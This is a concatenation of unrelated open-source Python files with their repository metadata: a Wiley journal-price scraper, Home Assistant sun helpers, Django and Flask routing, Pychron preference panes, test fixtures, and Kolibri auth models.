.findall(self.driver
.find_element_by_xpath("//div[@id='displayJAPCL']/a[1]")
.get_attribute("href")))
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def __get_price(self):
try:
price = str(int(round(float(self.driver.find_element_by_id("displayJAPC")
.text.replace(",", "").replace("$", "")))))
except ValueError as e:
raise MissingAttributeException
return price
def get_entries(self):
selected = self.soup.find(class_="journal")
journal_select = Select(self.driver.find_element_by_id("journal"))
# getting rid of first "description" row
journal_gen = WileyScraper.__get_child_tag_strings(selected)
next(journal_gen)
for journal in journal_gen:
try:
journal_select.select_by_visible_text(journal)
except NoSuchElementException:
print "Couldn't find matching journal for input: " + str(journal)
continue
oa_option_element = self.driver.find_element_by_id("displayJOAP")
if (oa_option_element.text == "Fully Open Access") or (oa_option_element.text == "OpenChoice"):
try:
price = self.__get_price()
except MissingAttributeException:
print journal + ": Unable to find price"
continue
try:
issn_matches = self.__get_issn()
except MissingAttributeException:
print "Error: " + journal + "\n\t" + oa_option_element.text
continue
journal_type = "OA" if oa_option_element.text == "Fully Open Access" else "Hybrid"
yield self.to_unicode_row(["Wiley", journal, str(date.today()), journal_type, issn_matches, price])
| {
"content_hash": "3ea0d45e26965dbff329201a6c86ec66",
"timestamp": "",
"source": "github",
"line_count": 345,
"max_line_length": 117,
"avg_line_length": 36.26086956521739,
"alnum_prop": 0.5806554756195044,
"repo_name": "PatrickSpieker/ThePyStrikesBack",
"id": "cb6c8cb6291df6eee2acfbe318315ec4fe55853c",
"size": "12546",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scrapers/journalscrapers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "22749"
}
],
"symlink_target": ""
} |
"""Helpers for sun events."""
from __future__ import annotations
import datetime
from typing import TYPE_CHECKING
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
from homeassistant.core import HomeAssistant, callback
from homeassistant.loader import bind_hass
from homeassistant.util import dt as dt_util
if TYPE_CHECKING:
import astral
DATA_LOCATION_CACHE = "astral_location_cache"
ELEVATION_AGNOSTIC_EVENTS = ("noon", "midnight")
@callback
@bind_hass
def get_astral_location(
    hass: HomeAssistant,
) -> tuple[astral.location.Location, astral.Elevation]:
    """Get an astral location for the current Home Assistant configuration."""
    from astral import LocationInfo  # pylint: disable=import-outside-toplevel
    from astral.location import Location  # pylint: disable=import-outside-toplevel

    info = (
        "",
        "",
        str(hass.config.time_zone),
        hass.config.latitude,
        hass.config.longitude,
    )

    # Cache astral locations so they aren't recreated with the same args.
    cache = hass.data.setdefault(DATA_LOCATION_CACHE, {})
    if info not in cache:
        cache[info] = Location(LocationInfo(*info))
    return cache[info], hass.config.elevation
@callback
@bind_hass
def get_astral_event_next(
    hass: HomeAssistant,
    event: str,
    utc_point_in_time: datetime.datetime | None = None,
    offset: datetime.timedelta | None = None,
) -> datetime.datetime:
    """Calculate the next specified solar event."""
    # Delegate: resolve (location, elevation) from hass config, then compute.
    return get_location_astral_event_next(
        *get_astral_location(hass), event, utc_point_in_time, offset
    )
@callback
def get_location_astral_event_next(
    location: astral.location.Location,
    elevation: astral.Elevation,
    event: str,
    utc_point_in_time: datetime.datetime | None = None,
    offset: datetime.timedelta | None = None,
) -> datetime.datetime:
    """Calculate the next specified solar event."""
    if offset is None:
        offset = datetime.timedelta()
    if utc_point_in_time is None:
        utc_point_in_time = dt_util.utcnow()

    kwargs = {"local": False}
    if event not in ELEVATION_AGNOSTIC_EVENTS:
        kwargs["observer_elevation"] = elevation

    # Walk forward day by day, starting one day back so an event later today
    # (relative to local date) is not skipped.
    base_date = dt_util.as_local(utc_point_in_time).date()
    day_shift = -1
    while True:
        try:
            candidate: datetime.datetime = (
                getattr(location, event)(
                    base_date + datetime.timedelta(days=day_shift), **kwargs
                )
                + offset
            )
            if candidate > utc_point_in_time:
                return candidate
        except ValueError:
            # Event does not occur on that date (e.g. polar day/night).
            pass
        day_shift += 1
@callback
@bind_hass
def get_astral_event_date(
    hass: HomeAssistant,
    event: str,
    date: datetime.date | datetime.datetime | None = None,
) -> datetime.datetime | None:
    """Calculate the astral event time for the specified date."""
    location, elevation = get_astral_location(hass)

    # Normalise the input to a local calendar date.
    if date is None:
        date = dt_util.now().date()
    elif isinstance(date, datetime.datetime):
        date = dt_util.as_local(date).date()

    kwargs = {"local": False}
    if event not in ELEVATION_AGNOSTIC_EVENTS:
        kwargs["observer_elevation"] = elevation

    try:
        return getattr(location, event)(date, **kwargs)  # type: ignore[no-any-return]
    except ValueError:
        # Event never occurs for specified date.
        return None
@callback
@bind_hass
def is_up(
    hass: HomeAssistant, utc_point_in_time: datetime.datetime | None = None
) -> bool:
    """Calculate if the sun is currently up."""
    point = dt_util.utcnow() if utc_point_in_time is None else utc_point_in_time
    # The sun is up exactly when the next sunset comes before the next sunrise.
    return get_astral_event_next(hass, SUN_EVENT_SUNRISE, point) > get_astral_event_next(
        hass, SUN_EVENT_SUNSET, point
    )
| {
"content_hash": "c083c918f613adc6c6e35b679488cfda",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 86,
"avg_line_length": 29.861313868613138,
"alnum_prop": 0.6590075776093864,
"repo_name": "GenericStudent/home-assistant",
"id": "09a329cd2752ba6c7d3954753f96b13f6084cf36",
"size": "4091",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/helpers/sun.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3070"
},
{
"name": "Python",
"bytes": "44491729"
},
{
"name": "Shell",
"bytes": "5092"
}
],
"symlink_target": ""
} |
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
# Register each viewset under its URL prefix.
for prefix, viewset in (
    (r'posts', views.PostViewSet),
    (r'comments', views.CommentViewSet),
    (r'tags', views.TagViewSet),
):
    router.register(prefix, viewset)

urlpatterns = [
    url(r'^', include(router.urls)),
]
| {
"content_hash": "6a809d6dc31adaffa6d890a66aa63450",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 50,
"avg_line_length": 25.615384615384617,
"alnum_prop": 0.7657657657657657,
"repo_name": "ppnchb/django-board",
"id": "651249f629f30ff11bed4b6831eaf409e827ea59",
"size": "333",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_board/api_v1/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "2302"
},
{
"name": "Python",
"bytes": "54554"
}
],
"symlink_target": ""
} |
Test.describe('Example test')
# The mean of 1, 2 and 3 is 2.
nums = [1, 2, 3]
Test.assert_equals(find_average(nums), 2)
| {
"content_hash": "b8e4104f1abdbcce3d838e5772a43954",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 42,
"avg_line_length": 30.333333333333332,
"alnum_prop": 0.7032967032967034,
"repo_name": "RevansChen/online-judge",
"id": "a5adfe085f06b99a345c14361df6055b68f9e722",
"size": "109",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Codewars/8kyu/calculate-average/Python/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Brainfuck",
"bytes": "102"
},
{
"name": "C",
"bytes": "6829"
},
{
"name": "C#",
"bytes": "19758"
},
{
"name": "C++",
"bytes": "9439"
},
{
"name": "Clojure",
"bytes": "75"
},
{
"name": "CoffeeScript",
"bytes": "903"
},
{
"name": "Crystal",
"bytes": "52"
},
{
"name": "Dart",
"bytes": "182"
},
{
"name": "Elixir",
"bytes": "1027"
},
{
"name": "Erlang",
"bytes": "132"
},
{
"name": "F#",
"bytes": "40"
},
{
"name": "Go",
"bytes": "83"
},
{
"name": "Haskell",
"bytes": "102"
},
{
"name": "Java",
"bytes": "11057"
},
{
"name": "JavaScript",
"bytes": "44773"
},
{
"name": "Kotlin",
"bytes": "82"
},
{
"name": "Lua",
"bytes": "93"
},
{
"name": "PHP",
"bytes": "2875"
},
{
"name": "Python",
"bytes": "563400"
},
{
"name": "R",
"bytes": "265"
},
{
"name": "Ruby",
"bytes": "7171"
},
{
"name": "Rust",
"bytes": "74"
},
{
"name": "Scala",
"bytes": "84"
},
{
"name": "Shell",
"bytes": "438"
},
{
"name": "Swift",
"bytes": "6597"
},
{
"name": "TSQL",
"bytes": "3531"
},
{
"name": "TypeScript",
"bytes": "5744"
}
],
"symlink_target": ""
} |
from flask import Blueprint

# Blueprint for file-related routes, mounted under the /file URL prefix.
bp = Blueprint('file', __name__, url_prefix='/file')

# Imported after `bp` is defined so the views module can reference it —
# presumably to avoid a circular import; verify against views.py.
from . import views
| {
"content_hash": "97766981a8ef21d9b56e6af5ee24d798",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 52,
"avg_line_length": 20.6,
"alnum_prop": 0.6893203883495146,
"repo_name": "justin-sh/amber-and-justin",
"id": "0df335a44e3f1986fd7d08c9f748f953388b5c07",
"size": "103",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blueprints/file/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "145609"
},
{
"name": "HTML",
"bytes": "19598"
},
{
"name": "JavaScript",
"bytes": "117654"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "23686"
}
],
"symlink_target": ""
} |
from envisage.ui.tasks.preferences_pane import PreferencesPane
from traits.api import Str, Int, Bool, Password, Color, Property, Float, Enum
from traitsui.api import View, Item, Group, VGroup, HGroup, UItem
from pychron.core.pychron_traits import PositiveInteger, PositiveFloat
from pychron.core.ui.custom_label_editor import CustomLabel
from pychron.envisage.tasks.base_preferences_helper import (
BasePreferencesHelper,
BaseConsolePreferences,
BaseConsolePreferencesPane,
)
from pychron.pychron_constants import (
QTEGRA_INTEGRATION_TIMES,
XE,
NE,
KR,
HE,
AR_AR,
GENERIC,
)
class ExperimentPreferences(BasePreferencesHelper):
    """Preferences helper backing the main Experiment preferences page."""

    preferences_path = "pychron.experiment"
    id = "pychron.experiment.preferences_page"

    laboratory = Str
    experiment_type = Enum(AR_AR, GENERIC, HE, KR, NE, XE)
    instrument_name = Str
    use_uuid_path_name = Bool
    use_notifications = Bool
    notifications_port = PositiveInteger
    use_autoplot = Bool
    send_config_before_run = Bool
    verify_spectrometer_configuration = Bool
    # Auto-save of the experiment queue after a delay
    use_auto_save = Bool
    auto_save_delay = PositiveInteger
    # Measurement plot colors
    baseline_color = Color
    sniff_color = Color
    signal_color = Color
    # Editor row colors
    bg_color = Color
    even_bg_color = Color
    min_ms_pumptime = PositiveInteger
    use_memory_check = Bool
    # Exposed via the property below so a None value is ignored on set.
    memory_threshold = Property(PositiveInteger, depends_on="_memory_threshold")
    _memory_threshold = Int
    use_analysis_grouping = Bool
    grouping_threshold = Float
    grouping_suffix = Str
    use_automated_run_monitor = Bool
    set_integration_time_on_start = Bool
    default_integration_time = Enum(*QTEGRA_INTEGRATION_TIMES)
    automated_runs_editable = Bool
    use_xls_persistence = Bool
    use_db_persistence = Bool
    # Run-state colors
    success_color = Color
    extraction_color = Color
    measurement_color = Color
    canceled_color = Color
    truncated_color = Color
    failed_color = Color
    end_after_color = Color
    invalid_color = Color
    # Analysis-type colors
    use_analysis_type_colors = Bool
    blank_color = Color
    air_color = Color
    cocktail_color = Color
    use_equilibration_analysis = Bool
    use_peak_center_threshold = Bool
    peak_center_threshold = PositiveFloat(3)
    peak_center_threshold_window = PositiveInteger(10)
    n_executed_display = PositiveInteger
    failed_intensity_count_threshold = PositiveInteger(3)
    ratio_change_detection_enabled = Bool(False)
    use_preceding_blank = Bool(False)
    plot_panel_update_period = PositiveInteger(1)
    execute_open_queues = Bool
    save_all_runs = Bool

    def _get_memory_threshold(self):
        return self._memory_threshold

    def _set_memory_threshold(self, v):
        # Ignore None so clearing the field does not clobber the stored value.
        if v is not None:
            self._memory_threshold = v
class UserNotifierPreferences(BasePreferencesHelper):
    """Server credentials and options for the user notifier."""

    preferences_path = "pychron.experiment"
    server_username = Str
    server_password = Password
    server_host = Str
    server_port = PositiveInteger
    # Include the log in notifications when set — confirm against the
    # notifier implementation.
    include_log = Bool
class ConsolePreferences(BaseConsolePreferences):
    """Console display preferences for the Experiment plugin."""

    preferences_path = "pychron.experiment"
    use_message_colormapping = Bool
class HumanErrorCheckerPreferences(BasePreferencesHelper):
    """Toggles for the pre-run human-error checks."""

    preferences_path = "pychron.experiment"
    # NOTE(review): "humar" looks like a typo for "human", but this id string
    # may be persisted or referenced elsewhere — confirm before renaming.
    id = "pychron.experiment.humar_error_checker.preferences_page"
    extraction_script_enabled = Bool
    queue_enabled = Bool
    non_fatal_enabled = Bool
    runs_enabled = Bool
# ======================================================================================================
# panes
# ======================================================================================================
class HumanErrorCheckerPreferencesPane(PreferencesPane):
    """Preferences pane (UI) for the human-error checker toggles."""

    model_factory = HumanErrorCheckerPreferences
    category = "Experiment"

    def traits_view(self):
        """Assemble the human-error checker preferences view."""
        queue_item = Item(
            "queue_enabled",
            label="Queue",
            tooltip="Check queue for errors like missing Extract Device",
        )
        runs_item = Item("runs_enabled", label="Runs", tooltip="Check runs for errors")
        non_fatal_item = Item(
            "non_fatal_enabled",
            label="Non-Fatal",
            tooltip="Warn user about non-fatal issues like missing scripts",
        )
        extraction_item = Item(
            "extraction_script_enabled",
            label="Extraction Script",
            tooltip="Check that the Extraction Script matches the Extract Device",
        )
        return View(
            VGroup(
                queue_item,
                runs_item,
                non_fatal_item,
                extraction_item,
                show_border=True,
                label="Human-Error Checker",
            )
        )
class ExperimentPreferencesPane(PreferencesPane):
    """Preferences pane (UI) for :class:`ExperimentPreferences`."""

    model_factory = ExperimentPreferences
    category = "Experiment"

    def traits_view(self):
        """Assemble the Experiment preferences UI from its option groups."""
        # General experiment behavior
        general_grp = VGroup(
            Item(
                "execute_open_queues",
                label="Execute Open Queues",
                tooltip="After the active queue finishes continue running any other open tabs "
                "in order from left to right",
            ),
            Item("experiment_type", label="Experiment Type"),
            Item(
                "send_config_before_run",
                tooltip="Set the spectrometer configuration before each analysis",
                label="Set Spectrometer Configuration on Start",
            ),
            Item(
                "verify_spectrometer_configuration",
                enabled_when="send_config_before_run",
                tooltip="Verify spectrometer configuration is properly set, "
                "otherwise cancel experiment",
            ),
            Item(
                "default_integration_time", enabled_when="set_integration_time_on_start"
            ),
            Item(
                "n_executed_display",
                label="N. Executed",
                tooltip='Number of analyses to display in the "Executed" table',
            ),
            Item("use_preceding_blank", label="Use Preceding Blank"),
            label="General",
        )
        # Queue-editor behavior and row colors
        editor_grp = VGroup(
            Item(
                "automated_runs_editable",
                label="Direct editing",
                tooltip="Allow user to edit Automated Runs directly within table. "
                "Reopen experiment tab required to take effect",
            ),
            Item(
                "use_auto_save",
                tooltip='If "Use auto save" experiment queue saved after "timeout" seconds',
            ),
            Item(
                "auto_save_delay",
                label="Auto save timeout (s)",
                tooltip='If experiment queue is not saved then wait "timeout" seconds'
                " before saving or canceling",
            ),
            Item("bg_color", label="Background"),
            Item("even_bg_color", label="Even Row"),
            label="Editor",
        )
        # All color pickers: measurement traces, run states, analysis types
        color_group = VGroup(
            VGroup(
                Item("sniff_color", label="Equilibration"),
                Item("baseline_color", label="Baseline"),
                Item("signal_color", label="Signal"),
                show_border=True,
                label="Measurement Colors",
            ),
            VGroup(
                Item("success_color", label="Success"),
                Item("extraction_color", label="Extraction"),
                Item("measurement_color", label="Measurement"),
                Item("canceled_color", label="Canceled"),
                Item("truncated_color", label="Truncated"),
                Item("failed_color", label="Failed"),
                Item("end_after_color", label="End After"),
                Item("invalid_color", label="Invalid"),
                show_border=True,
                label="State Colors",
            ),
            VGroup(
                Item("use_analysis_type_colors", label="Use Analysis Type Colors"),
                Item("blank_color", label="Blank"),
                Item("air_color", label="Air"),
                Item("cocktail_color", label="Cocktail"),
            ),
            label="Colors",
        )
        monitor_grp = Group(
            Item(
                "use_automated_run_monitor",
                label="Use AutomatedRun Monitor",
                tooltip="Use the automated run monitor",
            ),
            show_border=True,
            label="Monitor",
        )
        overlap_grp = Group(
            Item("min_ms_pumptime", label="Min. Mass Spectrometer Pumptime (s)"),
            show_border=True,
            label="Overlap",
        )
        persist_grp = Group(
            Item("use_xls_persistence", label="Save analyses to Excel workbook"),
            Item("use_db_persistence", label="Save analyses to Database"),
            Item("use_uuid_path_name", label="Use UUID Path Names"),
            Item(
                "save_all_runs",
                label="Save All analyses",
                tooltip="Save analysis even if run canceled or failed",
            ),
            label="Persist",
            show_border=True,
        )
        pc_grp = Group(
            Item(
                "use_peak_center_threshold",
                label="Use Peak Center Threshold",
                tooltip="Only peak center if intensity is greater than the peak center threshold",
            ),
            Item(
                "peak_center_threshold",
                label="Threshold",
                enabled_when="use_peak_center_threshold",
            ),
            Item(
                "peak_center_threshold_window",
                label="Window",
                enabled_when="use_peak_center_threshold",
            ),
            show_border=True,
            label="Peak Center",
        )
        # Automated-run options; nests the peak-center/persist/monitor/overlap groups
        automated_grp = Group(
            VGroup(
                Item(
                    "set_integration_time_on_start",
                    tooltip="Set integration time on start of analysis",
                    label="Set Integration Time on Start",
                ),
                Item(
                    "use_equilibration_analysis",
                    label="Do Equilibration Analysis",
                    tooltip="Analyze and display equilibration results",
                ),
                Item(
                    "failed_intensity_count_threshold",
                    label="N. Failed Intensity",
                    tooltip="Cancel Experiment if pychron fails to get intensities from "
                    'mass spectrometer more than "N. Failed Intensity" times',
                ),
                Item(
                    "ratio_change_detection_enabled",
                    label="Ratio Change Detection",
                    tooltip="Cancel experiment if significant changes in configured "
                    "isotopic ratios are detected. "
                    'Configured via "setupfiles/ratio_change_detection.yaml"',
                ),
                Item(
                    "plot_panel_update_period",
                    label="Regression Update Period",
                    tooltip="update the isotope regression graph every N counts",
                ),
                pc_grp,
                persist_grp,
                monitor_grp,
                overlap_grp,
            ),
            label="Automated Run",
        )
        return View(
            general_grp,
            color_group,
            automated_grp,
            # notification_grp,
            editor_grp,
        )
class UserNotifierPreferencesPane(PreferencesPane):
    """Preferences pane (UI) for :class:`UserNotifierPreferences`."""

    model_factory = UserNotifierPreferences
    category = "Experiment"

    def traits_view(self):
        """Build the single-item user-notifier preferences view."""
        return View(
            VGroup(
                Item("include_log"),
                show_border=True,
                label="User Notifier",
            )
        )
class ConsolePreferencesPane(BaseConsolePreferencesPane):
    """Preferences pane (UI) for :class:`ConsolePreferences`."""

    model_factory = ConsolePreferences
    label = "Experiment"

    def traits_view(self):
        """Build the console preferences view with a live font/color preview."""
        font_controls = HGroup(UItem("fontsize"), UItem("textcolor"), UItem("bgcolor"))
        preview_label = CustomLabel(
            "preview",
            size_name="fontsize",
            color_name="textcolor",
            bgcolor_name="bgcolor",
        )
        return View(
            VGroup(
                font_controls,
                preview_label,
                Item("use_message_colormapping"),
                show_border=True,
                label=self.label,
            )
        )
# ============= EOF =============================================
| {
"content_hash": "55087239eec7e00d271c38da4c22b0ec",
"timestamp": "",
"source": "github",
"line_count": 377,
"max_line_length": 104,
"avg_line_length": 33.09814323607427,
"alnum_prop": 0.539669818881231,
"repo_name": "NMGRL/pychron",
"id": "2700f409a4ece812a7d1671eeedfd6f50af7c236",
"size": "13278",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "pychron/experiment/tasks/experiment_preferences.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "128"
},
{
"name": "C++",
"bytes": "3706"
},
{
"name": "CSS",
"bytes": "263"
},
{
"name": "Cython",
"bytes": "1692"
},
{
"name": "Fortran",
"bytes": "455875"
},
{
"name": "HTML",
"bytes": "46796"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Processing",
"bytes": "11421"
},
{
"name": "Python",
"bytes": "10773692"
},
{
"name": "Shell",
"bytes": "1003"
}
],
"symlink_target": ""
} |
from fixture import DataSet
class ValidNoRelationsData(DataSet):
    """Two well-formed fixture rows for the ``app.NoRelations`` model."""

    class Meta:
        django_model = 'app.NoRelations'

    class one:
        char = "one"
        num = 1

    class two:
        char = "two"
        num = 2
class InvalidNoRelationsData(DataSet):
    """Fixture rows with fields (``invalid``, ``some_other``) that do not
    exist on ``app.NoRelations`` — presumably used to exercise error
    handling; confirm against the test suite."""

    class Meta:
        django_model = 'app.NoRelations'

    class one:
        char = "one"
        invalid = 'test'

    class two:
        char = "two"
        some_other = 2
class AuthorData(DataSet):
    """Fixture rows for the ``app.Author`` model."""

    class Meta:
        django_model = 'app.Author'

    class frank_herbert:
        first_name = "Frank"
        last_name = "Herbert"

    class guido:
        first_name = "Guido"
        last_name = "Van rossum"
class BookData(DataSet):
    """Fixture rows for ``app.Book``; each row references an AuthorData row
    to populate the foreign key."""

    class Meta:
        django_model = 'app.Book'

    class dune:
        title = "Dune"
        author = AuthorData.frank_herbert

    class python:
        title = 'Python'
        author = AuthorData.guido
class ReviewerData(DataSet):
    """Fixture row for ``app.Reviewer``; ``reviewed`` holds a list of
    BookData rows — presumably a many-to-many relation, verify against
    the model definition."""

    class Meta:
        django_model = 'app.Reviewer'

    class ben:
        name = 'ben'
        reviewed = [BookData.dune, BookData.python]
| {
"content_hash": "4ab8e5b0038256b8b10f6373dd0d34dc",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 51,
"avg_line_length": 18.131147540983605,
"alnum_prop": 0.5650994575045208,
"repo_name": "winhamwr/django-xls-fixtures",
"id": "d513102e6777ec445874dfd26628c5a057e5e4af",
"size": "1106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xls_fixtures/test/project/app/fixtures.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "15137"
}
],
"symlink_target": ""
} |
"""
We have four main abstractions: Users, Collections, Memberships, and Roles.
Users represent people, like students in a school, teachers for a classroom, or volunteers setting up informal
installations. There are two main user types, ``FacilityUser`` and ``DeviceOwner``. A ``FacilityUser`` belongs to a
particular facility, and has permissions only with respect to other data that is associated with that facility. A
``DeviceOwner`` is not associated with a particular facility, and has global permissions for data on the local device.
``FacilityUser`` accounts (like other facility data) may be synced across multiple devices, whereas a DeviceOwner account
is specific to a single installation of Kolibri.
Collections form a hierarchy, with Collections able to belong to other Collections. Collections are subdivided
into several pre-defined levels (``Facility`` > ``Classroom`` > ``LearnerGroup``).
A ``FacilityUser`` (but not a ``DeviceOwner``) can be marked as a member of a ``Collection`` through a ``Membership``
object. Being a member of a Collection also means being a member of all the Collections above that Collection in the
hierarchy.
Another way in which a ``FacilityUser`` can be associated with a particular ``Collection`` is through a ``Role``
object, which grants the user a role with respect to the ``Collection`` and all the collections below it. A ``Role``
object also stores the "kind" of the role (currently, one of "admin" or "coach"), which affects what permissions the
user gains through the ``Role``.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging as logger
from django.contrib.auth.models import AbstractBaseUser, AnonymousUser
from django.core import validators
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.query import F
from django.db.utils import IntegrityError
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from kolibri.core.errors import KolibriValidationError
from mptt.models import MPTTModel, TreeForeignKey
from six import string_types
from .constants import collection_kinds, role_kinds
from .errors import (
InvalidRoleKind, UserDoesNotHaveRoleError, UserHasRoleOnlyIndirectlyThroughHierarchyError, UserIsMemberOnlyIndirectlyThroughHierarchyError,
UserIsNotFacilityUser, UserIsNotMemberError
)
from .filters import HierarchyRelationsFilter
from .permissions.auth import (
AnybodyCanCreateIfNoDeviceOwner, AnybodyCanCreateIfNoFacility, CollectionSpecificRoleBasedPermissions,
AnonUserCanReadFacilitiesThatAllowSignUps, IsAdminForOwnFacilityDataset
)
from .permissions.base import BasePermissions, RoleBasedPermissions
from .permissions.general import IsAdminForOwnFacility, IsFromSameFacility, IsOwn, IsSelf
logging = logger.getLogger(__name__)
def _has_permissions_class(obj):
return hasattr(obj, "permissions") and isinstance(obj.permissions, BasePermissions)
@python_2_unicode_compatible
class FacilityDataset(models.Model):
    """
    ``FacilityDataset`` stores high-level metadata and settings for a particular ``Facility``. It is also the
    model that all models storing facility data (data that is associated with a particular facility, and that inherits
    from ``AbstractFacilityDataModel``) foreign key onto, to indicate that they belong to this particular ``Facility``.
    """

    # Only admins of the owning facility's dataset may modify it.
    permissions = IsAdminForOwnFacilityDataset()

    description = models.TextField(blank=True)
    location = models.CharField(max_length=200, blank=True)

    # Facility specific configuration settings
    learner_can_edit_username = models.BooleanField(default=False)
    learner_can_edit_name = models.BooleanField(default=False)
    learner_can_edit_password = models.BooleanField(default=False)
    learner_can_sign_up = models.BooleanField(default=False)
    learner_can_delete_account = models.BooleanField(default=False)

    def __str__(self):
        # A dataset reaches its Facility through the related Collection set;
        # look for a facility-kind collection, if any has been created yet.
        facilities = self.collection_set.filter(kind=collection_kinds.FACILITY)
        if facilities:
            return "FacilityDataset for {}".format(Facility.objects.get(id=facilities[0].id))
        else:
            return "FacilityDataset (no associated Facility)"
class AbstractFacilityDataModel(models.Model):
    """
    Base model for Kolibri "Facility Data", which is data that is specific to a particular ``Facility``,
    such as ``FacilityUsers``, ``Collections``, and other data associated with those users and collections.
    """

    # Every facility-data record points at the dataset of the facility it belongs to.
    dataset = models.ForeignKey(FacilityDataset)

    class Meta:
        abstract = True

    def clean_fields(self, *args, **kwargs):
        # ensure that we have, or can infer, a dataset for the model instance
        self.ensure_dataset()
        super(AbstractFacilityDataModel, self).clean_fields(*args, **kwargs)

    def save(self, *args, **kwargs):
        # before saving, ensure we have a dataset, and convert any validation errors into integrity errors,
        # since by this point the `clean_fields` method should already have prevented this situation from arising
        try:
            self.ensure_dataset()
        except KolibriValidationError as e:
            raise IntegrityError(str(e))
        super(AbstractFacilityDataModel, self).save(*args, **kwargs)

    def ensure_dataset(self):
        """
        If no dataset has yet been specified, try to infer it. If a dataset has already been specified, to prevent
        inconsistencies, make sure it matches the inferred dataset, otherwise raise a ``KolibriValidationError``.
        If we have no dataset and it can't be inferred, we raise a ``KolibriValidationError`` exception as well.
        """
        inferred_dataset = self.infer_dataset()
        if self.dataset_id:
            # make sure currently stored dataset matches inferred dataset, if any
            if inferred_dataset and inferred_dataset != self.dataset:
                raise KolibriValidationError("This model is not associated with the correct FacilityDataset.")
        else:
            # use the inferred dataset, if there is one, otherwise throw an error
            if inferred_dataset:
                self.dataset = inferred_dataset
            else:
                raise KolibriValidationError("FacilityDataset ('dataset') not provided, and could not be inferred.")

    def infer_dataset(self):
        """
        This method is used by `ensure_dataset` to "infer" which dataset should be associated with this instance.
        It should be overridden in any subclass of ``AbstractFacilityDataModel``, to define a model-specific inference.
        """
        raise NotImplementedError("Subclasses of AbstractFacilityDataModel must override the `infer_dataset` method.")
class KolibriAbstractBaseUser(AbstractBaseUser):
    """
    Our custom user type, derived from ``AbstractBaseUser`` as described in the Django docs.
    Draws liberally from ``django.contrib.auth.AbstractUser``, except we exclude some fields
    we don't care about, like email.
    This model is an abstract model, and is inherited by both ``FacilityUser`` and ``DeviceOwner``.
    """

    class Meta:
        abstract = True

    USERNAME_FIELD = "username"

    username = models.CharField(
        _('username'),
        max_length=30,
        help_text=_('Required. 30 characters or fewer. Letters and digits only'),
        validators=[
            validators.RegexValidator(
                r'^\w+$',
                _('Enter a valid username. This value may contain only letters and numbers.')
            ),
        ],
    )
    full_name = models.CharField(_('full name'), max_length=120, blank=True)
    date_joined = models.DateTimeField(_('date joined'), default=timezone.now, editable=False)

    def get_short_name(self):
        """Return the first space-separated word of the user's full name."""
        return self.full_name.split(' ', 1)[0]

    def is_member_of(self, coll):
        """
        Determine whether this user is a member of the specified ``Collection``.
        :param coll: The ``Collection`` for which we are checking this user's membership.
        :return: ``True`` if this user is a member of the specified ``Collection``, otherwise False.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `is_member_of` method.")

    def get_roles_for_user(self, user):
        """
        Determine all the roles this user has in relation to the target user, and return a set containing the kinds of roles.
        :param user: The target user for which this user has the roles.
        :return: The kinds of roles this user has with respect to the target user.
        :rtype: set of ``kolibri.auth.constants.role_kinds.*`` strings
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `get_roles_for_user` method.")

    def get_roles_for_collection(self, coll):
        """
        Determine all the roles this user has in relation to the specified ``Collection``, and return a set containing the kinds of roles.
        :param coll: The target ``Collection`` for which this user has the roles.
        :return: The kinds of roles this user has with respect to the specified ``Collection``.
        :rtype: set of ``kolibri.auth.constants.role_kinds.*`` strings
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `get_roles_for_collection` method.")

    def has_role_for_user(self, kinds, user):
        """
        Determine whether this user has (at least one of) the specified role kind(s) in relation to the specified user.
        :param user: The user that is the target of the role (for which this user has the roles).
        :param kinds: The kind (or kinds) of role to check for, as a string or iterable.
        :type kinds: string from ``kolibri.auth.constants.role_kinds.*``
        :return: ``True`` if this user has the specified role kind with respect to the target user, otherwise ``False``.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `has_role_for_user` method.")

    def has_role_for_collection(self, kinds, coll):
        """
        Determine whether this user has (at least one of) the specified role kind(s) in relation to the specified ``Collection``.
        :param kinds: The kind (or kinds) of role to check for, as a string or iterable.
        :type kinds: string from kolibri.auth.constants.role_kinds.*
        :param coll: The target ``Collection`` for which this user has the roles.
        :return: ``True`` if this user has the specified role kind with respect to the target ``Collection``, otherwise ``False``.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `has_role_for_collection` method.")

    def can_create_instance(self, obj):
        """
        Checks whether this user (self) has permission to create a particular model instance (obj).
        This method should be overridden by classes that inherit from ``KolibriAbstractBaseUser``.
